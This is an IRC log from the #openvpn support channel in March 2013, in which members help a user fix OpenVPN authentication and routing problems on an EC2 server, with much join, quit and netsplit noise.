[nobody@openvpn/community/support/krzee] has joined #openvpn 12:46 -!- mode/#openvpn [+o krzee] by ChanServ 12:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:22 -!- mirco [~mirco@ip-95-222-244-247.unitymediagroup.de] has joined #openvpn 13:25 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Quit: Konversation terminated!] 13:28 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 260 seconds] 13:29 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 13:33 -!- mirco [~mirco@ip-95-222-244-247.unitymediagroup.de] has quit [Quit: mirco] 13:45 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has joined #openvpn 13:45 < jasonsmr> hello openvpn chennel 13:46 < jasonsmr> Quesion I am working with a server client configuration and for some reason my client is not auto configuring the tun adapter? 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 13:53 -!- penk [~dave@216.142.113.81] has joined #openvpn 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:55 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 14:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 14:05 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 14:05 -!- penk [~dave@216.142.113.81] has quit [Quit: Leaving...] 14:11 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 257 seconds] 14:14 < jzaw> jasonsmr, what system ... os ... is some other script taking over ? etc etc 14:15 < jzaw> paste your server and client confs 14:24 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Quit: Hurr Durr!] 14:27 < jasonsmr> its CentOS 6.3 14:27 < jasonsmr> just a sec ill pastebin 14:29 -!- tyteen4a03 [tyteen4a03@ec2-54-225-157-7.compute-1.amazonaws.com] has joined #openvpn 14:31 -!- MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Ping timeout: 252 seconds] 14:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:37 < jasonsmr> heres the client side configuration >> http://sprunge.us/EGLH 14:37 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:37 < jasonsmr> and heres the server side configuration >> http://sprunge.us/bWNO 14:39 < jasonsmr> the thing is I am trying this in a EC2 VM so I have a public accessable address that I can point a client to for accessing the server, but from the servers point of view thats a non existant or inaccessable address (the server can not ping itself) 14:44 < pekster> jasonsmr: Your server specifies --client-cert-not-required yet your client config attempts to use certs instead of --auth-user-pass 14:45 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:45 < jasonsmr> I definatly want it to use certs if possable, but was also using radius server, are both used required? 14:46 < jasonsmr> I got lost 14:46 < pekster> See --client-cert-not-required in the manpage. You're telling it that clients do not need to providei them 14:46 < jasonsmr> allright ill remove this from the server.conf 14:47 < pekster> Clients still need --auth-user-pass to even pass in the un/pw. Further, the 'reneg-sec 0' setting in your server is also worthless since the client will renegotiate after 3600 seconds anyway as the client-side default 14:47 < pekster> (and you're sacrificing perfefct forward secrecy by doing that anyway, for not any tangible benefit either) 14:48 < jasonsmr> thanks for helping me clean it up 14:58 -!- Rough_ [Ah2k@114.31.8.194] has joined #openvpn 15:04 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 15:12 -!- teknoprep [~quassel@unaffiliated/teknoprep] has quit [Read error: Connection reset by peer] 15:18 -!- VisionNL [~anonymous@tuig.nikhef.nl] has joined #openvpn 15:20 < VisionNL> question: why is OpenVPN so strict with the certificate flags for TLS Client and TLS Server 15:21 < VisionNL> I noticed that setting both the TLS Client and TLS Server on my client or server certificates resulted in a TLS handshake failure. Which sounds a bit pedantic. Is there a motivation for it? 15:25 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 15:49 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 15:51 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Quit: Coyote finally caught me] 15:51 -!- zhvtar [~zhvtar@198.23.139.102] has joined #openvpn 15:51 -!- zhvtar [~zhvtar@198.23.139.102] has quit [Changing host] 15:51 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 16:04 < jasonsmr> hello again I am still having problems with authorization on my vpn server it says that it fails at tls auth 16:04 < jasonsmr> heres a pastebin of my log >> http://sprunge.us/KNfQ 16:06 < jasonsmr> and in turn here is my server.conf file for openvpn >> 8 16:06 < jasonsmr> http://sprunge.us/dSTQ 16:06 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 16:07 < jasonsmr> and my client config >> http://sprunge.us/TLjF 16:12 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 16:17 -!- master_of_master [~master_of@p4FF247F7.dip.t-dialin.net] has joined #openvpn 16:20 -!- master_o1_master [~master_of@p4FF244B8.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 16:28 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:38 < jpalmer> jasonsmr: check the time on both servers. make sure it's right (use ntpdate) 16:39 < jpalmer> jasonsmr: nevermind, I was looking at a different paste. the time thing is unrelated 16:43 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 16:43 -!- mode/#openvpn [+o krzee] by ChanServ 16:44 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Ping timeout: 260 seconds] 16:45 -!- MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 16:46 -!- brute11k [~brute@89.249.230.134] has quit [Ping timeout: 260 seconds] 16:46 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Ping timeout: 276 seconds] 16:47 -!- brute11k [~brute@89.249.230.134] has joined #openvpn 16:53 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 16:55 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 16:56 -!- p3rror [~mezgani@196.201.78.139] has joined #openvpn 16:58 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 17:06 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 17:11 < civillian> jasonsmr: looks like radius auth failed: PLUGIN_CALL: POST /etc/openvpn/radiusplugin.so/PLUGIN_AUTH_USER_PASS_VERIFY status=1 17:11 < civillian> status should be 0 for pass I believe 17:14 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 264 seconds] 17:15 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 272 seconds] 17:16 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 17:18 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 17:18 -!- mattock_afk is now known as mattock 17:18 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:18 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:18 -!- mode/#openvpn [+o mattock] by ChanServ 17:19 < jasonsmr> I tried creating a user fothanks 17:19 < jasonsmr> thanks Ill look at it 17:21 -!- maetrik [maetrik@185.14.184.81] has joined #openvpn 17:26 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has quit [Quit: Leaving...] 17:29 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 260 seconds] 17:29 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 17:30 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 256 seconds] 17:30 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 17:30 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 17:32 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 17:32 -!- jarray52 [~bigbear@unaffiliated/jarray52] has joined #openvpn 17:33 -!- jtrucks is now known as troll 17:33 -!- troll is now known as jtrucks 17:36 -!- mattock_afk [~mattock@raidz.im] has quit [Ping timeout: 245 seconds] 17:38 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 260 seconds] 17:41 -!- novaflash is now known as novaflash_away 17:42 -!- mattock_afk [~mattock@raidz.im] has joined #openvpn 17:42 -!- raidz_away [~raidz@46.28.203.186] has joined #openvpn 17:42 -!- raidz_away is now known as raidz 17:42 -!- raidz [~raidz@46.28.203.186] has quit [Changing host] 17:42 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 17:43 -!- mode/#openvpn [+o raidz] by ChanServ 17:43 -!- mattock_afk is now known as mattock 17:43 -!- mattock [~mattock@raidz.im] has quit [Changing host] 17:43 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 17:43 -!- mode/#openvpn [+o mattock] by ChanServ 17:44 -!- Orbi [~opera@anon-186-55.vpn.ipredator.se] has left #openvpn [] 17:47 -!- JSharpe_ [~JSharpe@5.69.13.182] has joined #openvpn 17:49 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Ping timeout: 256 seconds] 17:49 -!- penk [~dave@pool-100-0-131-24.bstnma.east.verizon.net] has joined #openvpn 17:51 -!- novaflash_away is now known as novaflash 17:53 < jasonsmr> Okey this is strange in an effort to just test to see if everything else is allright I used a authorization method secrets = file instead of cerver crt and client crt files 17:55 < jasonsmr> well after this change in the server and client config files I found that my client machine would freeze up and needed to be restarted, note that this is a EC2 instance and it could just be that the networking is gone... ether way its not allowing pubilc access to my public net and vpn ?? 17:56 -!- p3rror [~mezgani@196.201.78.139] has quit [Quit: Leaving] 18:01 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 18:02 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:07 -!- nsx [~ns@87-57-145-221-dynamic.dk.customer.tdc.net] has joined #openvpn --- Log closed Sun Mar 24 18:10:21 2013 --- Log opened Sun Mar 24 18:15:43 2013 18:15 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn 18:15 -!- Irssi: #openvpn: Total of 178 nicks [6 ops, 0 halfops, 1 voices, 171 normal] 18:15 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-vqvgtzvvbbbougmj] has quit [Ping timeout: 245 seconds] 18:15 -!- VisionNL_ [~anonymous@tuig.nikhef.nl] has joined #openvpn 18:16 -!- Irssi: Join to #openvpn was synced in 40 secs 18:16 -!- rheddry [~levifig@spwn.co] has joined #openvpn 18:16 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 18:16 -!- Pei_ [~pei@thinks.outside.theb0x.org] has joined #openvpn 18:16 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 18:17 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:17 -!- _matt [~matt@mlpc.wiltshire.ac.uk] has joined #openvpn 18:17 -!- soapee01_ [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 18:18 -!- JSharpe__ [~JSharpe@5.69.13.182] has joined #openvpn 18:18 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 258 seconds] 18:18 -!- _matt is now known as Guest42485 18:18 -!- nonotza_ [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has joined #openvpn 18:18 -!- havoc_ [~havoc@208.87.120.111] has joined #openvpn 18:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 18:20 -!- Netsplit *.net <-> *.split quits: kloeri, Wintereise, JStoker, zu_, GabrieleV, folivora, pulz, matt_, @ecrist, VisionNL, (+1 more, use /NETSPLIT to show all of them) 18:20 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 18:20 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has joined #openvpn 18:21 -!- kloeri_ is now known as kloeri 18:21 -!- JSharpe_ [~JSharpe@5.69.13.182] has quit [Ping timeout: 264 seconds] 18:22 -!- krphop_ [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 18:22 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 18:22 -!- tyteen4a03 [tyteen4a03@us2.freeBNC.net] has joined #openvpn 18:23 -!- soapee01 [~soapee01@24-155-219-177.dyn.grandenetworks.net] has quit [Ping timeout: 245 seconds] 18:23 -!- Pei [~pei@thinks.outside.theb0x.org] has quit [Ping timeout: 248 seconds] 18:23 -!- sitaktif [~sitaktif@kollok.org] has quit [Ping timeout: 248 seconds] 18:23 -!- kmmndr [~tomtom@bro67-2-82-227-110-8.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 18:23 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 248 seconds] 18:23 -!- havoc [~havoc@neptune.chaillet.net] has quit [Ping timeout: 248 seconds] 18:23 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Ping timeout: 248 seconds] 18:23 -!- nonotza_ is now known as nonotza 18:24 -!- Netsplit *.net <-> *.split quits: Scrumps, Ancient 18:24 -!- Netsplit *.net <-> *.split quits: Valcorb 18:24 -!- sitaktif1 [~sitaktif@kollok.org] has joined #openvpn 18:25 -!- Scrumps [~asdfgjkl@cpe-173-095-129-006.nc.res.rr.com] has joined #openvpn 18:28 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:28 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 18:29 -!- Ancient [~ancient@us.whatbox.ca] has joined #openvpn 18:29 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 18:29 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 18:30 < jasonsmr> So any help I have openvpn connecting now using the secrets option in the server / client conf files acordingly but theres a problem that it severs my public network connection at the same time it connects the VPN 18:31 < jasonsmr> any help with keeping the public connection active is greatly appreaceated 18:33 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 18:33 < nikitosiusis> jasonsmr, do you use redirect-gateway ? 18:34 -!- You're now known as ecrist 18:35 -!- mode/#openvpn [+o ecrist] by ChanServ 18:35 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 18:35 -!- mode/#openvpn [+o krzee] by ChanServ 18:35 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 18:36 -!- Ancient [~ancient@us.whatbox.ca] has quit [Ping timeout: 256 seconds] 18:36 -!- Ancient|2 [~ancient@us.whatbox.ca] has joined #openvpn 18:44 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 18:45 -!- NotKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 18:46 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds] 18:46 -!- Denial- is now known as Denial 18:46 -!- nonotza [~nonotza@cpe-74-73-232-198.nyc.res.rr.com] has quit [Quit: nonotza] 18:47 -!- abec0_ [olivier@vvma.net] has joined #openvpn 18:47 -!- eres_ [~rs@onyon.net] has joined #openvpn 18:47 -!- Netsplit *.net <-> *.split quits: Olipro, piele, [fred] 18:48 -!- Netsplit over, joins: piele, Olipro, [fred] 18:48 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Max SendQ exceeded] 18:50 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 256 seconds] 18:52 -!- Netsplit *.net <-> *.split quits: zarrsh, VunKruz, sitaktif1, +[oc80z], jarray521, cronix, fatpony, eres, ceda, abec0, (+1 more, use /NETSPLIT to show all of them) 18:52 -!- ngharo [~ngharo@hacked.thegov.us] has quit [Ping timeout: 264 seconds] 18:52 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 18:53 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds] 18:53 -!- ngharo [~ngharo@hacked.thegov.us] has joined #openvpn 18:54 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 18:54 -!- pcdummy_ [~quassel@mx1.page4me.ch] has joined #openvpn 18:55 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Ping timeout: 264 seconds] 18:55 -!- jasonsmr [~Administr@c-68-61-42-207.hsd1.mi.comcast.net] has joined #openvpn 18:56 < jasonsmr> hello again 18:56 < jasonsmr> what do you mean redirect-gateway ? 18:57 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 18:57 -!- jarray52 [~bigbear@unaffiliated/jarray52] has joined #openvpn 18:57 -!- jpalmer_ [~jpalmer@irc.PalmerIT.net] has joined #openvpn 18:57 -!- Netsplit *.net <-> *.split quits: cyberspace-, tabakhase, havoc_, jave 18:57 -!- jarray52 [~bigbear@unaffiliated/jarray52] has left #openvpn [] 18:58 -!- Netsplit *.net <-> *.split quits: mcp, penk, mete, n2deep, joshie, MorgyN, roue_ 18:58 -!- njbair_ [~njbair@user-12l369d.cable.mindspring.com] has joined #openvpn 18:58 -!- krzie [nobody@openvpn/community/support/krzee] has joined #openvpn 18:58 -!- mode/#openvpn [+o krzie] by ChanServ 18:58 < jasonsmr> oh yes on the client config I have redirect-gateway def1 18:58 -!- nastjuid_ [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has joined #openvpn 18:58 -!- parmegv_ [U2FsdGVkX1@ma.sdf.org] has joined #openvpn 18:58 < jasonsmr> can I safely take this out? 18:59 <@krzie> if you don't want it... 18:59 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 18:59 -!- zarrsh [~zarrsh@cpe-65-27-192-220.cinci.res.rr.com] has joined #openvpn 18:59 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 264 seconds] 19:00 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 19:00 < jasonsmr> right I guess not, if its attempting to redirect the default gatway, which apparently that is it s function ;) 19:01 -!- Netsplit over, joins: mete 19:01 -!- krzie is now known as krzee 19:01 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Ping timeout: 256 seconds] 19:01 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 264 seconds] 19:02 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 19:02 -!- jpalmer [~jpalmer@unaffiliated/jpalmer] has quit [Excess Flood] 19:02 -!- parmegv [U2FsdGVkX1@ma.sdf.org] has quit [Write error: Broken pipe] 19:02 -!- nastjuid [~nastjuid@c-76-102-128-160.hsd1.ca.comcast.net] has quit [Write error: Broken pipe] 19:02 -!- njbair [~njbair@user-12l369d.cable.mindspring.com] has quit [Write error: Broken pipe] 19:02 -!- havoc [~havoc@208.87.120.111] has joined #openvpn 19:02 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 19:02 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 19:02 -!- tabakhase [t4b4kh453@unaffiliated/tabakhase] has joined #openvpn 19:02 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Excess Flood] 19:02 -!- C-S-B [~C-S-B@host86-171-109-108.range86-171.btcentralplus.com] has quit [Excess Flood] 19:02 <@krzee> pekster, your tip about adding an extra return 0 to my functions is continuing to help me. thanks again :) 19:02 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn 19:03 -!- cyberspace- [20253@ninthfloor.org] has quit [Max SendQ exceeded] 19:03 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 19:03 -!- simcop2387_ is now known as simcop2387 19:03 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 19:03 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 19:03 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 19:03 -!- oc80z [oc80z@blea.ch] has joined #openvpn 19:03 -!- C_S_B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn 19:03 -!- batrick_ [~batrick@batbytes.com] has joined #openvpn 19:03 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 19:03 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 19:03 -!- joshie [~josh@joshie.net] has joined #openvpn 19:03 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 19:04 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 19:04 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 19:04 -!- ceda [~fredrik@c83-248-146-227.bredband.comhem.se] has joined #openvpn 19:04 -!- cronix [~cronix@HSI-KBW-046-005-192-177.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 19:04 -!- fatpony [~fatpony@unaffiliated/fatpony] has joined #openvpn 19:04 -!- Cr4zi3 [killaz@staff.xbins.org] has quit [Excess Flood] 19:04 -!- Cr4zi3 [killaz@staff.xbins.org] has joined #openvpn 19:05 < jasonsmr> okey that seems to work the way that I want it to, now how do I setup the radius method becaus the radius method with the ca.srt server and client did not work for me, 19:05 <@krzee> radius method? 19:06 < jasonsmr> Im trying to setup a cluster and the VPN was just to have another method of communicating within the cluster 19:06 < jasonsmr> well apparently there was a method to authenticate using the radius server plugin opposed to the secrets file method 19:07 -!- joshie_ [~josh@joshie.net] has joined #openvpn 19:08 <@krzee> yep, have you read the docs on the radius plugin? 19:08 -!- penk [~dave@mcovernet.mosaic-commons.org] has joined #openvpn 19:08 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 272 seconds] 19:08 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 272 seconds] 19:11 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 19:11 -!- n2deep_ [n2deep@odin.sdf-eu.org] has joined #openvpn 19:12 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Disconnected by services] 19:14 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:14 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:14 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 272 seconds] 19:15 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 272 seconds] 19:15 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Remote host closed the connection] 19:15 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 19:16 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-yzqmsjdgbqggwoyb] has joined #openvpn 19:17 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 256 seconds] 19:18 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 256 seconds] 19:19 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn 19:19 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 19:20 -!- n2deep_ [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 245 seconds] 19:21 -!- pekster_ [~rewt@cl-466.chi-03.us.sixxs.net] has joined #openvpn 19:21 -!- pekster_ [~rewt@cl-466.chi-03.us.sixxs.net] has quit [Changing host] 19:21 -!- pekster_ [~rewt@openvpn/community/support/pekster] has joined #openvpn 19:21 -!- penk [~dave@mcovernet.mosaic-commons.org] has quit [Quit: Leaving...] 19:21 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn 19:21 -!- tyteen4a03 [tyteen4a03@us2.freeBNC.net] has quit [Ping timeout: 264 seconds] 19:21 -!- pekster [~rewt@openvpn/community/support/pekster] has quit [Ping timeout: 264 seconds] 19:21 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 19:21 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 19:22 -!- Netsplit *.net <-> *.split quits: cronix, ceda, fatpony 19:22 -!- thumbs is now known as httpd 19:23 -!- Netsplit over, joins: ceda 19:23 -!- httpd is now known as thumbs 19:23 -!- Netsplit over, joins: cronix 19:23 -!- Netsplit over, joins: fatpony 19:24 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 19:24 -!- Netsplit *.net <-> *.split quits: speed_racer8, _quadDamage, simcop2387, rob0, eres_, MeanderingCode_ 19:24 -!- simcop2387_ is now known as simcop2387 19:25 -!- tyteen4a03 [tyteen4a03@us2.freeBNC.net] has joined #openvpn 19:26 -!- penk [~dave@97.95.190.204] has joined #openvpn 19:27 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-xkuztbndblojovtg] has quit [Ping timeout: 256 seconds] 19:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:28 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 19:28 -!- oc80z [oc80z@blea.ch] has quit [Ping timeout: 258 seconds] 19:28 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 258 seconds] 19:28 -!- tcamuso_ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has quit [Ping timeout: 258 seconds] 19:29 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 258 seconds] 19:29 -!- tcamuso__ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has joined #openvpn 19:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:29 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:29 -!- hazardous [~dbn@void.kassad.in] has quit [Ping timeout: 258 seconds] 19:29 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 19:30 -!- eres [~rs@83.167.228.121] has joined #openvpn 19:30 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 258 seconds] 19:30 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 258 seconds] 19:30 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 19:30 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 19:30 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 19:31 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 256 seconds] 19:31 -!- soapee01_ is now known as soapee01 19:31 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 19:32 -!- jzaw [~jzaw@loki.dzki.co.uk] has quit [Ping timeout: 258 seconds] 19:32 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 19:32 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 256 seconds] 19:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 19:32 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 258 seconds] 19:32 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 19:32 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 19:32 -!- mode/#openvpn [+o vpnHelper] by ChanServ 19:32 -!- Ancient|2 [~ancient@us.whatbox.ca] has left #openvpn ["Leaving"] 19:33 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Read error: Operation timed out] 19:33 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 19:33 -!- lmm [uid6417@gateway/web/irccloud.com/x-pdubufobwmodlaqn] has quit [Ping timeout: 256 seconds] 19:33 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 19:33 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Ping timeout: 258 seconds] 19:34 -!- js_ [~js@li503-152.members.linode.com] has quit [Ping timeout: 258 seconds] 19:34 -!- lmm [uid6417@gateway/web/irccloud.com/x-jbjiakelitrhoejp] has joined #openvpn 19:34 -!- Netsplit *.net <-> *.split quits: fatpony, inimino, joshie_ 19:35 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 19:35 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Ping timeout: 256 seconds] 19:36 -!- pppingme [~pppingme@65.28.110.103] has joined #openvpn 19:36 -!- pppingme [~pppingme@65.28.110.103] has quit [Changing host] 19:36 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 19:36 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 256 seconds] 19:36 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 258 seconds] 19:36 -!- AsadH [~AsadH@unaffiliated/asadh] has quit [Ping timeout: 258 seconds] 19:37 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Client Quit] 19:37 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-wkuxkpkoldxkvqtz] has quit [Ping timeout: 245 seconds] 19:37 -!- tcamuso__ [~tcamuso@pool-71-161-82-88.cncdnh.east.myfairpoint.net] has quit [Ping timeout: 256 seconds] 19:38 -!- pppingme 